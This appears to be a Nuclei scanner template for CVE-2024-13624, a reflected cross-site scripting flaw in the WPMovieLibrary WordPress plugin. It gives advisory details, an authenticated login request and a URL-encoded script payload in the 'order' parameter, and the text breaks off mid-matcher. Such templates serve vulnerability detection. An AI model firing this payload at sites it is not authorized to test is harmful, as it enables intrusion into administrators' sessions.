id: CVE-2024-13624

info:
  name: WordPress WPMovieLibrary Plugin <= 2.1.4.8 - Cross-Site Scripting
  author: ritikchaddha
  severity: high
  description: |
    The WPMovieLibrary WordPress plugin through version 2.1.4.8 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'order' parameter in the import page before outputting it back, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context.
  impact: |
    Authenticated attackers can execute arbitrary JavaScript in an administrator's browser context via the order parameter, potentially leading to session hijacking or privilege escalation.
  remediation: |
    Update WPMovieLibrary plugin to a version newer than 2.1.4.8.
  reference:
    - https://wpscan.com/vulnerability/c19b56cc-634f-420f-b6a0-9a10ad159049
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13624
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
    cvss-score: 7.1
    cve-id: CVE-2024-13624
    cwe-id: CWE-79
    epss-score: 0.00654
    epss-percentile: 0.46608
  metadata:
    verified: true
    max-request: 2
    product: wpmovielibrary
    fofa-query: body="wp-content/plugins/wpmovielibrary/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,xss,wpmovielibrary,authenticated,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - 'wpmovielibrary'
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=wpmovielibrary-import&order=1%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '">